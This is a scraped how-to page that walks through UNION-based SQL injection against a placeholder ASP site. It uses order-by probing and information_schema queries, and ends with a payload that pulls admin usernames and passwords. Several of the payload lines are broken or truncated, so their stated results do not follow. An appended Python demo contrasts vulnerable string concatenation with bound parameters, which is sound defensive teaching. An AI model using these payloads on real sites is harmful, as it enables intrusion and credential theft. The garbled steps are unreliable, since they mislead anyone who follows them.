SQL injection: UNION query

2025-01-19 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

For example, there is a website: www.xxxxx.com/artist.asp?id=2

id=2 order by 3 is normal
id=2 order by 4 is not normal

So order by shows that the query returns 3 fields in total.

id=2 union select 1,2,database() # reveals the database name

Some pages do not display multiple rows, so the data added by the union query will not be shown; the preceding statement has to be invalidated first.

id=-2 union select 1
id=-2 union select ()
id=-2 union select 1 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' # known database sqlzhuru, table name (the first table)

Entering select * from admin where id=-2 reports an error because id=-2 does not exist.

You can also use the following statement, which has the same effect as id=-2.

id=2 and 1=2 union select 1,TABLE_NAME,3 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' # known database sqlzhuru, table name (first table)
id=2 and 1=2 union select 1 from information_schema.TABLES where TABLE_SCHEMA='sqlzhuru' limit 1 # known database sqlzhuru, second table

If you get the admin table, continue as follows:

id=2 and 1=2 union select 1 from information_schema.COLUMNS where TABLE_NAME='admin' limit 1 # known admin table
id=2 and 1=2 union select 1 # known admin table, two column names
id=2 and 1=2 union select 1 # known admin table, 3 column names
1 # known admin table (hexadecimal represents the admin table)

If the steps above return the username and password columns of the admin table, you can then list the data in them:

id=2 and 1=2 union select 1,username,password from admin
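Why the statements above work, and what stops them, shown as an added example that is not part of the original article: the same 3-column lookup built by string concatenation and with a bound parameter. The Python/SQLite setup, the table layout, the sample rows and all function names are assumptions made for the demonstration; the article's target is an ASP page on a database with information_schema.

```python
import sqlite3

# The page's last union select against the admin table (id parameter value).
PAGE_PAYLOAD = "2 and 1=2 union select 1,username,password from admin"

def make_db():
    """Constructed sample data: artist has 3 columns, as order by showed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE artist (id INTEGER PRIMARY KEY, name TEXT, bio TEXT);
        CREATE TABLE admin  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO artist VALUES (1, 'Ana', 'painter'), (2, 'Ben', 'sculptor');
        INSERT INTO admin  VALUES (1, 'root', 'constructed-hash');
    """)
    return db

def artist_concatenated(db, raw_id):
    # Vulnerable: the parameter becomes part of the SQL text, so "and 1=2"
    # empties the artist result and the union row is displayed in its place.
    sql = "SELECT id, name, bio FROM artist WHERE id=" + raw_id
    return db.execute(sql).fetchall()

def artist_bound(db, raw_id):
    # Hardened: the parameter is bound as a value and is never parsed as SQL.
    return db.execute(
        "SELECT id, name, bio FROM artist WHERE id=?", (raw_id,)
    ).fetchall()

def artist_validated(db, raw_id):
    # Defence in depth: the id must be a plain integer before it is bound.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    return artist_bound(db, int(raw_id))

if __name__ == "__main__":
    db = make_db()
    print("concatenated:", artist_concatenated(db, PAGE_PAYLOAD))
    print("bound:       ", artist_bound(db, PAGE_PAYLOAD))
    print("bound, id=2: ", artist_bound(db, "2"))
```

With the bound parameter the whole string is compared against the id column as one value, so the query matches no row and the admin table is never read.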
